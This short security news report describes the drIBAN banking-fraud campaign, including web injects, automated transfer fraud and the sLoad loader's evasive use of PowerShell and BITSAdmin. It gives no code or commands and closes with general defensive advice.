According to Cleafy examiners Federico Valentini and Alessandro Strino, the primary objective of drIBAN fraud activities is to contaminate Windows workstations inside businesses in an effort to change valid banking transfers made by the victims by changing the beneficiary and transferring money to an unauthorized bank account.
Web injects are a well-established method employed by cybercriminals to inject their own scripts into legitimate websites using a man-in-the-browser (MitB) attack, enabling them to intercept traffic between the user’s browser and the server.
The illegal transactions are frequently carried out via a method known as Automated Transfer System (ATS), which may go beyond bank-installed anti-fraud measures and start unlawful wire transfers from the victim’s computer.
According to Cleafy, the year 2021 marked the transformation of the traditional “banking trojan” activity into an advanced persistent threat. Further evidence suggests that the activity cluster coincides with a 2018 campaign run by an actor identified by Proofpoint as TA554 that targeted users in Canada, Italy, and the United Kingdom.
The malware loader sLoad uses PowerShell to gather and exfiltrate data from infected systems. Its main goal is to analyze the victim and ascertain whether it is lucrative enough to support a heavier payload, such as the banking trojan Ramnit.
By leveraging genuine Windows technologies like PowerShell and BITSAdmin, sLoad exploits living-off-the-land (LotL) tactics to avoid being discovered. A predetermined list of corporate financial institutions can also be checked by the virus to see if the compromised workstation is one of the targets. If so, sLoad continues to spread the infection.
SLoad is particularly hard to find and defend against threat because of its evasion strategy, which uses PowerShell and other legal Windows programs. Strong security practices and routine software updates to fix known vulnerabilities are preventative steps that organizations may take to reduce the probability of a sLoad infection.